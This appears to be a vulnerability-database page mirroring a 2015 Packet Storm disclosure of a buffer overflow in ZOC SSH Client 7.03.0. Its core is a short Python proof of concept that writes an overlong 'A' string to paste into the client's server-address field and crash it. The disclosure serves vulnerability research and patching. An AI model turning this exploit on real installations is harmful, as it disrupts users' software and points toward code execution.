Lucene search
K

ZOC SSH Client 7.03.0 Buffer Overflow

🗓️ 20 May 2015 00:00:00Reported by Dolev FarhiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

ZOC SSH Client v.7.03.0 Buffer Overflow vulnerabilit

Code
`# Exploit title: ZOC SSH Client v.7.03.0 Buffer overflow vulnerability (SEH)  
# Date: 20-5-2015  
# Vendor homepage: www.emtec.com  
# Software Link: http://www.emtec.com/cgi-local/download.cgi?what=ZOC7%20(Windows)&link=zoc/zoc7030.exe&ext=html  
# Author: Dolev Farhi  
  
# Details:  
# --------  
# Create a new connection, run the py script and copy the AAAA...string from zoc.txt to clipboard. paste it in the  
# server address and attempt to connect.  
"""  
  
#!/usr/bin/python  
filename="zoc.txt"  
buffer = "\x41" * 97  
textfile = open(filename , 'w')  
textfile.write(buffer)  
textfile.close()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 May 2015 00:00Current
0.4Low risk
Vulners AI Score0.4
18